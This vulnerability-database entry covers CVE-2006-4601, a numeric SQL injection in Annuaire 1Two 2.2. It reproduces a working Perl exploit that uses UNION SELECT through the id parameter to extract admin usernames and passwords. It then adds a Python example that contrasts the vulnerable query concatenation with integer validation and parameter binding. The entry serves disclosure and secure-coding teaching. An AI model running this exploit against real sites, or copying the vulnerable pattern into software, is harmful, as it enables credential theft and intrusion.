Annuaire 1Two 'Index.PHP' SQL Injection Vulnerability

Vulnerability ID: 1110938    Vulnerability type: SQL injection
Published: 2006-09-02    Updated: 2006-09-13
CVE: CVE-2006-4601    CNNVD ID: CNNVD-200609-082
Platform: PHP    CVSS score: 7.5
|Vulnerability Sources
https://www.exploit-db.com/exploits/2289
https://cxsecurity.com/issue/WLB-2006090024
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200609-082
|Vulnerability Details
SQL injection vulnerability in index.php in Annuaire 1Two 2.2 allows remote attackers to execute arbitrary SQL commands via the id parameter.
|Vulnerability EXP
#!/usr/bin/perl
#
# Affected.scr..: Annuaire 1Two 2.2
# Poc.ID........: 09060902.txt
# Type..........: SQL Injection (without quote)
# Risk.level....: Medium
# Vendor.Status.: Unpatched
# Src.download..: http://www.1two.org/
# Poc.link......: acid-root.new.fr/poc/09060902.txt
# Credits.......: DarkFig
#
#
use LWP::UserAgent;
use HTTP::Request;
use Getopt::Long;
use strict;


print STDOUT "\n+", '-' x 53, "+\n";
print STDOUT "|    Annuaire 1Two 2.2 Remote SQL Injection Exploit   |\n";
print STDOUT '+', '-' x 53, "+\n";

my($host,$path,$proxh,$proxu,$proxp,);
my $opt = GetOptions(
   'host=s'   =>  \$host,
   'path=s'   =>  \$path,
   'proxh=s'  =>  \$proxh,
   'proxu=s'  =>  \$proxu,
   'proxp=s'  =>  \$proxp);
   
if(!$host) {
    print STDOUT "| Usage: ./xx.pl --host=[www] --path=[/] [Options]    |\n";
    print STDOUT "| [Options] --proxh=[ip] --proxu=[user] --proxp=[pwd] |\n";
    print STDOUT '+', '-' x 53, "+\n";
    exit(0);
}

if(!$path) {$path  = '/';}
if($host  !~ /http/) {$host  = 'http://'.$host;}
# string comparison ('ne'), not numeric '!=', and guard against an unset --proxh
if(defined $proxh && $proxh ne '' && $proxh !~ /http/) {$proxh = 'http://'.$proxh.'/';}

my @fi = ('username', 'password');
my $ur = $host.$path.'index.php?id=';
my $ua = LWP::UserAgent->new();
   $ua->agent('Mozilla XD');
   $ua->timeout(30);
   $ua->proxy(['http'] => $proxh) if $proxh;

foreach(@fi) {
    my $xx = $_;
    my $re = HTTP::Request->new(GET => $ur."-1 UNION SELECT $xx FROM 1two_annuaire_admin");
       $re->proxy_authorization_basic($proxu, $proxp) if $proxp;
    my $xd = $ua->request($re);
    my $da = $xd->content;

    # the injected column is reflected in the page <title> after " - "
    if($da =~ /- (.*?)<\/title>/) {
        if($xx eq 'username') { print STDOUT " [+]User:"; }
        if($xx eq 'password') { print STDOUT " [+]Passwd:"; }
        print STDOUT " $1\n";
    } else {
        print STDOUT "[!]Exploit failed\n";
    }
}
print STDOUT "+", '-' x 53, "+\n";
exit(0);

# milw0rm.com [2006-09-02]
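The PoC header labels this an injection "without quote": the id value is used in a numeric position of the query, so quote-escaping (addslashes, magic_quotes) cannot stop it, and only integer validation or parameter binding does. The following is an added example, not code from the advisory or from Annuaire 1Two: it models that flawed pattern and its hardened form in Python against an in-memory SQLite database, with constructed sample data. The column and table names other than 1two_annuaire_admin are assumptions.

```python
import sqlite3

# The admin table name comes from the PoC; it is double-quoted here because
# SQLite, unlike MySQL, rejects an unquoted identifier that starts with a digit.
ADMIN_TABLE = '"1two_annuaire_admin"'
# Payload shape used by the PoC above (column "username", injected after id=)
PAYLOAD = f"-1 UNION SELECT username FROM {ADMIN_TABLE}"


def make_db():
    """Constructed sample data standing in for the directory's tables."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(f"""
        CREATE TABLE entries (id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO entries VALUES (1, 'First link'), (2, 'Second link');
        CREATE TABLE {ADMIN_TABLE} (username TEXT, password TEXT);
        INSERT INTO {ADMIN_TABLE} VALUES ('admin', 'constructed-hash');
    """)
    return conn


def vulnerable_title(conn, raw_id):
    """Flawed pattern: the request value is concatenated into a numeric
    position, so no quote is needed to leave the literal and escaping
    quotes changes nothing. Returns the title rendered into the page."""
    escaped = raw_id.replace("'", "\\'")  # magic_quotes-style escaping: no effect here
    sql = "SELECT title FROM entries WHERE id=" + escaped
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def safe_title(conn, raw_id):
    """Hardened form: reject anything that is not an integer, then bind the
    value as a parameter so it is never parsed as part of the SQL text."""
    try:
        ident = int(raw_id)
    except ValueError:
        return None
    row = conn.execute("SELECT title FROM entries WHERE id=?", (ident,)).fetchone()
    return row[0] if row else None
```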
|References

Source: XF
Name: annuaire-1two-index-sql-injection(28730)
Link: http://xforce.iss.net/xforce/xfdb/28730
Source: BID
Name: 19817
Link: http://www.securityfocus.com/bid/19817
Source: BUGTRAQ
Name: 20060902 Annuaire 1Two 2.2 Remote SQL Injection Exploit
Link: http://www.securityfocus.com/archive/1/archive/1/445010/100/0/threaded
Source: VUPEN
Name: ADV-2006-3440
Link: http://www.frsirt.com/english/advisories/2006/3440
Source: SECUNIA
Name: 21734
Link: http://secunia.com/advisories/21734
Source: MISC
Link: http://acid-root.new.fr/poc/09060902.txt
Source: SREASON
Name: 1496
Link: http://securityreason.com/securityalert/1496